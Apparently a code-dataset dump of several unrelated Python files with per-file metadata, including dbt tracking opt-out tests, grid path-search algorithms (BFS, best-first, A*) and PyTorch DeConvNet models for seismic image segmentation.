"Apache-2.0"
] | 1
|
2021-11-23T20:28:07.000Z
|
2021-11-23T20:28:07.000Z
|
import dbt.tracking
import datetime
import shutil
import tempfile
import unittest
class TestTracking(unittest.TestCase):
def setUp(self):
dbt.tracking.active_user = None
self.tempdir = tempfile.mkdtemp()
def tearDown(self):
dbt.tracking.active_user = None
shutil.rmtree(self.tempdir)
def test_tracking_initial(self):
assert dbt.tracking.active_user is None
dbt.tracking.initialize_tracking(self.tempdir)
assert isinstance(dbt.tracking.active_user, dbt.tracking.User)
invocation_id = dbt.tracking.active_user.invocation_id
run_started_at = dbt.tracking.active_user.run_started_at
assert dbt.tracking.active_user.do_not_track is False
assert isinstance(dbt.tracking.active_user.id, str)
assert isinstance(invocation_id, str)
assert isinstance(run_started_at, datetime.datetime)
dbt.tracking.disable_tracking()
assert isinstance(dbt.tracking.active_user, dbt.tracking.User)
assert dbt.tracking.active_user.do_not_track is True
assert dbt.tracking.active_user.id is None
assert dbt.tracking.active_user.invocation_id == invocation_id
assert dbt.tracking.active_user.run_started_at == run_started_at
# this should generate a whole new user object -> new invocation_id/run_started_at
dbt.tracking.do_not_track()
assert isinstance(dbt.tracking.active_user, dbt.tracking.User)
assert dbt.tracking.active_user.do_not_track is True
assert dbt.tracking.active_user.id is None
assert isinstance(dbt.tracking.active_user.invocation_id, str)
assert isinstance(dbt.tracking.active_user.run_started_at, datetime.datetime)
assert dbt.tracking.active_user.invocation_id != invocation_id
# if you use `!=`, you might hit a race condition (especially on windows)
assert dbt.tracking.active_user.run_started_at is not run_started_at
def test_tracking_never_ok(self):
assert dbt.tracking.active_user is None
# this should generate a whole new user object -> new invocation_id/run_started_at
dbt.tracking.do_not_track()
assert isinstance(dbt.tracking.active_user, dbt.tracking.User)
assert dbt.tracking.active_user.do_not_track is True
assert dbt.tracking.active_user.id is None
assert isinstance(dbt.tracking.active_user.invocation_id, str)
assert isinstance(dbt.tracking.active_user.run_started_at, datetime.datetime)
def test_disable_never_enabled(self):
assert dbt.tracking.active_user is None
# this should generate a whole new user object -> new invocation_id/run_started_at
dbt.tracking.disable_tracking()
assert isinstance(dbt.tracking.active_user, dbt.tracking.User)
assert dbt.tracking.active_user.do_not_track is True
assert dbt.tracking.active_user.id is None
assert isinstance(dbt.tracking.active_user.invocation_id, str)
assert isinstance(dbt.tracking.active_user.run_started_at, datetime.datetime)
| 42.273973
| 90
| 0.734932
| 422
| 3,086
| 5.146919
| 0.137441
| 0.217772
| 0.25046
| 0.309392
| 0.816298
| 0.788214
| 0.734807
| 0.708564
| 0.655617
| 0.569521
| 0
| 0
| 0.19313
| 3,086
| 72
| 91
| 42.861111
| 0.872289
| 0.10175
| 0
| 0.538462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.576923
| 1
| 0.096154
| false
| 0
| 0.096154
| 0
| 0.211538
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
606c8f4142c49735fda388a01a5ac0cd4f3bafe4
| 286
|
py
|
Python
|
resemblance/main/similarity/conf/constants.py
|
Sorarinu/ProjectP2016_F
|
388afadea7e6efa2a43404c66d545482d75b2944
|
[
"MIT"
] | null | null | null |
resemblance/main/similarity/conf/constants.py
|
Sorarinu/ProjectP2016_F
|
388afadea7e6efa2a43404c66d545482d75b2944
|
[
"MIT"
] | null | null | null |
resemblance/main/similarity/conf/constants.py
|
Sorarinu/ProjectP2016_F
|
388afadea7e6efa2a43404c66d545482d75b2944
|
[
"MIT"
] | null | null | null |
BODY_TEXT_FILE = '/var/www/html/ProjectP2016_F/resemblance/main/similarity/conf/file/html_body.txt'
WAKATI_FILE = '/var/www/html/ProjectP2016_F/resemblance/main/similarity/conf/file/wakati.txt'
MODEL = '/var/www/html/ProjectP2016_F/resemblance/main/similarity/conf/models/sample.model'
| 71.5
| 99
| 0.821678
| 43
| 286
| 5.302326
| 0.395349
| 0.078947
| 0.131579
| 0.289474
| 0.754386
| 0.754386
| 0.754386
| 0.754386
| 0.754386
| 0.526316
| 0
| 0.043321
| 0.031469
| 286
| 3
| 100
| 95.333333
| 0.779783
| 0
| 0
| 0
| 0
| 1
| 0.832168
| 0.832168
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
60887d3f57b30db5e3807d01ea719a35d30eb2ac
| 162
|
py
|
Python
|
src/deterministic/__init__.py
|
kjhall01/learning_machines
|
fe40a2852658aeca304262a211d46b8d4e304e85
|
[
"MIT"
] | 1
|
2021-09-17T17:04:58.000Z
|
2021-09-17T17:04:58.000Z
|
src/deterministic/__init__.py
|
kjhall01/extremelearning
|
fe40a2852658aeca304262a211d46b8d4e304e85
|
[
"MIT"
] | null | null | null |
src/deterministic/__init__.py
|
kjhall01/extremelearning
|
fe40a2852658aeca304262a211d46b8d4e304e85
|
[
"MIT"
] | null | null | null |
from .elm import *
from .pca_initialization import *
from .pca_pruning import *
from .pca_transformed import *
from .drop_elm import *
from .pruned_elm import *
| 23.142857
| 33
| 0.771605
| 23
| 162
| 5.217391
| 0.391304
| 0.416667
| 0.325
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.154321
| 162
| 6
| 34
| 27
| 0.875912
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
60a06373f4c183d46d04179d82aa06a995cbb166
| 3,902
|
py
|
Python
|
SearchAlgorithms.py
|
SimonK91/search-algorithms
|
acce8752953db0c817027828d4c228e0f4d96ded
|
[
"MIT"
] | null | null | null |
SearchAlgorithms.py
|
SimonK91/search-algorithms
|
acce8752953db0c817027828d4c228e0f4d96ded
|
[
"MIT"
] | null | null | null |
SearchAlgorithms.py
|
SimonK91/search-algorithms
|
acce8752953db0c817027828d4c228e0f4d96ded
|
[
"MIT"
] | null | null | null |
from typing import Tuple, Optional, List, Dict, Set
from Grid import Grid
def _h_cost(a, b):
dx = abs(a[0] - b[0])
dy = abs(a[1] - b[1])
return dx + dy
def breadth_first_search(grid: Grid):
start = grid.get_start()
goal = grid.get_goal()
open_set: List[Tuple[int, int]] = []
route: Dict[Tuple[int, int], Tuple[int, int]] = {start: None}
closed_set: Set[Tuple[int, int]] = set()
path: List[Tuple[int, int]] = []
open_set.append(start)
while open_set:
yield open_set, closed_set, path
cell = open_set[0]
open_set.remove(cell)
closed_set.add(cell)
if cell == goal:
while cell:
path.append(cell)
cell = route[cell]
path = list(reversed(path))
break
else:
for nbr in grid.get_neighbours(*cell):
if nbr not in closed_set and nbr not in open_set:
route[nbr] = cell
open_set.append(nbr)
for i in range(len(path)):
yield open_set, closed_set, path[:i]
for i in range(100):
yield open_set, closed_set, path
def best_first_search(grid: Grid):
start = grid.get_start()
goal = grid.get_goal()
open_set: Set[Tuple[int, int]] = set()
route: Dict[Tuple[int, int], Tuple[int, int]] = {start: None}
closed_set: Set[Tuple[int, int]] = set()
path: List[Tuple[int, int]] = []
open_set.add(start)
while open_set:
yield open_set, closed_set, path
cell = None
cost = None
for obj in open_set:
cand_cost = _h_cost(obj, goal)
if cost is None or cand_cost < cost:
cell = obj
cost = cand_cost
open_set.remove(cell)
closed_set.add(cell)
if cell == goal:
while cell:
path.append(cell)
cell = route[cell]
path = list(reversed(path))
break
else:
for nbr in grid.get_neighbours(*cell):
if nbr not in closed_set and nbr not in open_set:
open_set.add(nbr)
route[nbr] = cell
for i in range(len(path)):
yield open_set, closed_set, path[:i]
for i in range(100):
yield open_set, closed_set, path
def a_star_search(grid: Grid):
start = grid.get_start()
goal = grid.get_goal()
open_set: Set[Tuple[int, int]] = set()
route: Dict[Tuple[int, int], Tuple[int, int]] = {start: None}
costs: Dict[Tuple[int, int], int] = {start: 0}
closed_set: Set[Tuple[int, int]] = set()
path: List[Tuple[int, int]] = []
open_set.add(start)
while open_set:
yield open_set, closed_set, path
cell: Optional[Tuple[int, int]] = None
cost: Optional[int] = None
for obj in open_set:
cand_cost = _h_cost(obj, goal) + costs[obj]
if cost is None or cand_cost < cost: # or (cand_cost == cost and costs[obj] > costs[cell]):
cell = obj
cost = cand_cost
open_set.remove(cell)
closed_set.add(cell)
if cell == goal:
while cell:
path.append(cell)
cell = route[cell]
path = list(reversed(path))
break
else:
for nbr in grid.get_neighbours(*cell):
if nbr not in closed_set:
if nbr not in open_set:
open_set.add(nbr)
route[nbr] = cell
costs[nbr] = costs[cell]+1
elif costs[cell] + 1 < costs[nbr]:
route[nbr] = cell
costs[nbr] = costs[cell] + 1
for i in range(len(path)):
yield open_set, closed_set, path[:i]
for i in range(100):
yield open_set, closed_set, path
| 29.78626
| 104
| 0.525884
| 528
| 3,902
| 3.742424
| 0.113636
| 0.106275
| 0.094636
| 0.081984
| 0.843117
| 0.843117
| 0.843117
| 0.843117
| 0.816802
| 0.790992
| 0
| 0.007249
| 0.36366
| 3,902
| 130
| 105
| 30.015385
| 0.788562
| 0.013327
| 0
| 0.787037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.018519
| 0
| 0.064815
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
60c2e87f77eece56394000713bd093ac6e608431
| 21,847
|
py
|
Python
|
core/models/DeConvNet.py
|
rarefin/Seismic-Image-Segmentation
|
aeb31d65b8f2bd4691f1da7a27e1e34310a389fb
|
[
"MIT"
] | 2
|
2020-09-17T10:11:48.000Z
|
2020-09-22T07:08:17.000Z
|
core/models/Redundant/DeConvNet.py
|
quamernasim/PETAI-master
|
d76f37bea1e313246a556871c6304370e9a5616b
|
[
"MIT"
] | null | null | null |
core/models/Redundant/DeConvNet.py
|
quamernasim/PETAI-master
|
d76f37bea1e313246a556871c6304370e9a5616b
|
[
"MIT"
] | 1
|
2021-11-15T16:58:39.000Z
|
2021-11-15T16:58:39.000Z
|
"""
This is the patch based Deconvolution network (without or with skip connection)for semantic segmentation of
seismic images. We are comparing our model(SeismicNet) with these two models. These models are provided as
baseline in the paper: https://arxiv.org/abs/1901.07659. The code is taken from:
https://github.com/olivesgatech/facies_classification_benchmark/blob/master/core/models/patch_deconvnet.py
"""
import torch.nn as nn
class DeConvNet(nn.Module):
def __init__(self, n_classes=4, learned_billinear=False):
super(DeConvNet, self).__init__()
self.learned_billinear = learned_billinear
self.n_classes = n_classes
self.unpool = nn.MaxUnpool2d(2, stride=2)
self.conv_block1 = nn.Sequential(
# conv1_1
nn.Conv2d(1, 64, 3, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv1_2
nn.Conv2d(64, 64, 3, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool1
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_1
# 48*48
self.conv_block2 = nn.Sequential(
# conv2_1
nn.Conv2d(64, 128, 3, padding=1),
nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv2_2
nn.Conv2d(128, 128, 3, padding=1),
nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool2
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_2
# 24*24
self.conv_block3 = nn.Sequential(
# conv3_1
nn.Conv2d(128, 256, 3, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv3_2
nn.Conv2d(256, 256, 3, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv3_3
nn.Conv2d(256, 256, 3, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool3
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_3
# 12*12
self.conv_block4 = nn.Sequential(
# conv4_1
nn.Conv2d(256, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv4_2
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv4_3
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool4
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_4
# 6*6
self.conv_block5 = nn.Sequential(
# conv5_1
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv5_2
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv5_3
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool5
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_5
# 3*3
self.conv_block6 = nn.Sequential(
# fc6
nn.Conv2d(512, 4096, 3),
# set the filter size and nor padding to make output into 1*1
nn.BatchNorm2d(4096, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
# 1*1
self.conv_block7 = nn.Sequential(
# fc7
nn.Conv2d(4096, 4096, 1),
# set the filter size to make output into 1*1
nn.BatchNorm2d(4096, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.deconv_block8 = nn.Sequential(
# fc6-deconv
nn.ConvTranspose2d(4096, 512, 3, stride=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
# 3*3
self.unpool_block9 = nn.Sequential(
# unpool5
nn.MaxUnpool2d(2, stride=2), )
# usage unpool(output, indices)
# 6*6
self.deconv_block10 = nn.Sequential(
# deconv5_1
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv5_2
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv5_3
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.unpool_block11 = nn.Sequential(
# unpool4
nn.MaxUnpool2d(2, stride=2), )
# 12*12
self.deconv_block12 = nn.Sequential(
# deconv4_1
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv4_2
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv4_3
nn.ConvTranspose2d(512, 256, 3, stride=1, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.unpool_block13 = nn.Sequential(
# unpool3
nn.MaxUnpool2d(2, stride=2), )
# 24*24
self.deconv_block14 = nn.Sequential(
# deconv3_1
nn.ConvTranspose2d(256, 256, 3, stride=1, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv3_2
nn.ConvTranspose2d(256, 256, 3, stride=1, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv3_3
nn.ConvTranspose2d(256, 128, 3, stride=1, padding=1),
nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.unpool_block15 = nn.Sequential(
# unpool2
nn.MaxUnpool2d(2, stride=2), )
# 48*48
self.deconv_block16 = nn.Sequential(
# deconv2_1
nn.ConvTranspose2d(128, 128, 3, stride=1, padding=1),
nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv2_2
nn.ConvTranspose2d(128, 64, 3, stride=1, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.unpool_block17 = nn.Sequential(
# unpool1
nn.MaxUnpool2d(2, stride=2), )
# 96*96
self.deconv_block18 = nn.Sequential(
# deconv1_1
nn.ConvTranspose2d(64, 64, 3, stride=1, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv1_2
nn.ConvTranspose2d(64, 64, 3, stride=1, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.seg_score19 = nn.Sequential(
# seg-score
nn.Conv2d(64, self.n_classes, 1), )
if self.learned_billinear:
raise NotImplementedError
def forward(self, x):
size0 = x.size()
conv1, indices1 = self.conv_block1(x)
size1 = conv1.size()
conv2, indices2 = self.conv_block2(conv1)
size2 = conv2.size()
conv3, indices3 = self.conv_block3(conv2)
size3 = conv3.size()
conv4, indices4 = self.conv_block4(conv3)
size4 = conv4.size()
conv5, indices5 = self.conv_block5(conv4)
conv6 = self.conv_block6(conv5)
conv7 = self.conv_block7(conv6)
conv8 = self.deconv_block8(conv7)
conv9 = self.unpool(conv8, indices5, output_size=size4)
conv10 = self.deconv_block10(conv9)
conv11 = self.unpool(conv10, indices4, output_size=size3)
conv12 = self.deconv_block12(conv11)
conv13 = self.unpool(conv12, indices3, output_size=size2)
conv14 = self.deconv_block14(conv13)
conv15 = self.unpool(conv14, indices2, output_size=size1)
conv16 = self.deconv_block16(conv15)
conv17 = self.unpool(conv16, indices1, output_size=size0)
conv18 = self.deconv_block18(conv17)
out = self.seg_score19(conv18)
return out
def init_vgg16_params(self, vgg16, copy_fc8=True):
blocks = [self.conv_block1,
self.conv_block2,
self.conv_block3,
self.conv_block4,
self.conv_block5]
ranges = [[0, 4], [5, 9], [10, 16], [17, 23], [24, 29]]
features = list(vgg16.features.children())
i_layer = 0;
# copy convolutional filters from vgg16
for idx, conv_block in enumerate(blocks):
for l1, l2 in zip(features[ranges[idx][0]:ranges[idx][1]], conv_block):
if isinstance(l1, nn.Conv2d) and isinstance(l2, nn.Conv2d):
if i_layer == 0:
l2.weight.data = ((l1.weight.data[:, 0, :, :] + l1.weight.data[:, 1, :, :] + l1.weight.data[:,
2, :,
:]) / 3.0).view(
l2.weight.size())
l2.bias.data = l1.bias.data
i_layer = i_layer + 1
else:
assert l1.weight.size() == l2.weight.size()
assert l1.bias.size() == l2.bias.size()
l2.weight.data = l1.weight.data
l2.bias.data = l1.bias.data
i_layer = i_layer + 1
class DeConvNetSkip(nn.Module):
def __init__(self, n_classes=4, learned_billinear=False):
super(DeConvNetSkip, self).__init__()
self.learned_billinear = learned_billinear
self.n_classes = n_classes
self.unpool = nn.MaxUnpool2d(2, stride=2)
self.conv_block1 = nn.Sequential(
# conv1_1
nn.Conv2d(1, 64, 3, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv1_2
nn.Conv2d(64, 64, 3, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool1
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_1
# 48*48
self.conv_block2 = nn.Sequential(
# conv2_1
nn.Conv2d(64, 128, 3, padding=1),
nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv2_2
nn.Conv2d(128, 128, 3, padding=1),
nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool2
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_2
# 24*24
self.conv_block3 = nn.Sequential(
# conv3_1
nn.Conv2d(128, 256, 3, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv3_2
nn.Conv2d(256, 256, 3, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv3_3
nn.Conv2d(256, 256, 3, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool3
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_3
# 12*12
self.conv_block4 = nn.Sequential(
# conv4_1
nn.Conv2d(256, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv4_2
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv4_3
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool4
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_4
# 6*6
self.conv_block5 = nn.Sequential(
# conv5_1
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv5_2
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# conv5_3
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# pool5
nn.MaxPool2d(2, stride=2, return_indices=True, ceil_mode=True), )
# it returns outputs and pool_indices_5
# 3*3
self.conv_block6 = nn.Sequential(
# fc6
nn.Conv2d(512, 4096, 3),
# set the filter size and nor padding to make output into 1*1
nn.BatchNorm2d(4096, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
# 1*1
self.conv_block7 = nn.Sequential(
# fc7
nn.Conv2d(4096, 4096, 1),
# set the filter size to make output into 1*1
nn.BatchNorm2d(4096, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.deconv_block8 = nn.Sequential(
# fc6-deconv
nn.ConvTranspose2d(4096, 512, 3, stride=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
# 3*3
self.unpool_block9 = nn.Sequential(
# unpool5
nn.MaxUnpool2d(2, stride=2), )
# usage unpool(output, indices)
# 6*6
self.deconv_block10 = nn.Sequential(
# deconv5_1
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv5_2
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv5_3
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.unpool_block11 = nn.Sequential(
# unpool4
nn.MaxUnpool2d(2, stride=2), )
# 12*12
self.deconv_block12 = nn.Sequential(
# deconv4_1
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv4_2
nn.ConvTranspose2d(512, 512, 3, stride=1, padding=1),
nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv4_3
nn.ConvTranspose2d(512, 256, 3, stride=1, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.unpool_block13 = nn.Sequential(
# unpool3
nn.MaxUnpool2d(2, stride=2), )
# 24*24
self.deconv_block14 = nn.Sequential(
# deconv3_1
nn.ConvTranspose2d(256, 256, 3, stride=1, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv3_2
nn.ConvTranspose2d(256, 256, 3, stride=1, padding=1),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv3_3
nn.ConvTranspose2d(256, 128, 3, stride=1, padding=1),
nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.unpool_block15 = nn.Sequential(
# unpool2
nn.MaxUnpool2d(2, stride=2), )
# 48*48
self.deconv_block16 = nn.Sequential(
# deconv2_1
nn.ConvTranspose2d(128, 128, 3, stride=1, padding=1),
nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv2_2
nn.ConvTranspose2d(128, 64, 3, stride=1, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.unpool_block17 = nn.Sequential(
# unpool1
nn.MaxUnpool2d(2, stride=2), )
# 96*96
self.deconv_block18 = nn.Sequential(
# deconv1_1
nn.ConvTranspose2d(64, 64, 3, stride=1, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True),
# deconv1_2
nn.ConvTranspose2d(64, 64, 3, stride=1, padding=1),
nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True),
nn.ReLU(inplace=True), )
self.seg_score19 = nn.Sequential(
# seg-score
nn.Conv2d(64, self.n_classes, 1), )
if self.learned_billinear:
raise NotImplementedError
def forward(self, x):
size0 = x.size()
conv1, indices1 = self.conv_block1(x)
size1 = conv1.size()
conv2, indices2 = self.conv_block2(conv1)
size2 = conv2.size()
conv3, indices3 = self.conv_block3(conv2)
size3 = conv3.size()
conv4, indices4 = self.conv_block4(conv3)
size4 = conv4.size()
conv5, indices5 = self.conv_block5(conv4)
conv6 = self.conv_block6(conv5)
conv7 = self.conv_block7(conv6)
conv8 = self.deconv_block8(conv7) + conv5
conv9 = self.unpool(conv8,indices5, output_size=size4)
conv10 = self.deconv_block10(conv9) + conv4
conv11 = self.unpool(conv10,indices4, output_size=size3)
conv12 = self.deconv_block12(conv11) + conv3
conv13 = self.unpool(conv12,indices3, output_size=size2)
conv14 = self.deconv_block14(conv13) + conv2
conv15 = self.unpool(conv14,indices2, output_size=size1)
conv16 = self.deconv_block16(conv15) + conv1
conv17 = self.unpool(conv16,indices1, output_size=size0)
conv18 = self.deconv_block18(conv17)
out = self.seg_score19(conv18)
return out
def init_vgg16_params(self, vgg16, copy_fc8=True):
blocks = [self.conv_block1,
self.conv_block2,
self.conv_block3,
self.conv_block4,
self.conv_block5]
ranges = [[0, 4], [5, 9], [10, 16], [17, 23], [24, 29]]
features = list(vgg16.features.children())
i_layer = 0;
# copy convolutional filters from vgg16
for idx, conv_block in enumerate(blocks):
for l1, l2 in zip(features[ranges[idx][0]:ranges[idx][1]], conv_block):
if isinstance(l1, nn.Conv2d) and isinstance(l2, nn.Conv2d):
if i_layer == 0:
l2.weight.data = ((l1.weight.data[:, 0, :, :] + l1.weight.data[:, 1, :, :] + l1.weight.data[:,
2, :,
:]) / 3.0).view(
l2.weight.size())
l2.bias.data = l1.bias.data
i_layer = i_layer + 1
else:
assert l1.weight.size() == l2.weight.size()
assert l1.bias.size() == l2.bias.size()
l2.weight.data = l1.weight.data
l2.bias.data = l1.bias.data
i_layer = i_layer + 1
| 34.029595
| 118
| 0.53568
| 2,712
| 21,847
| 4.228614
| 0.082596
| 0.020405
| 0.070806
| 0.075863
| 0.962853
| 0.962853
| 0.962853
| 0.962853
| 0.962853
| 0.962853
| 0
| 0.120703
| 0.340916
| 21,847
| 642
| 119
| 34.029595
| 0.675741
| 0.087792
| 0
| 0.957507
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011331
| 1
| 0.016997
| false
| 0
| 0.002833
| 0
| 0.031161
| 0
| 0
| 0
| 0
| null | 0
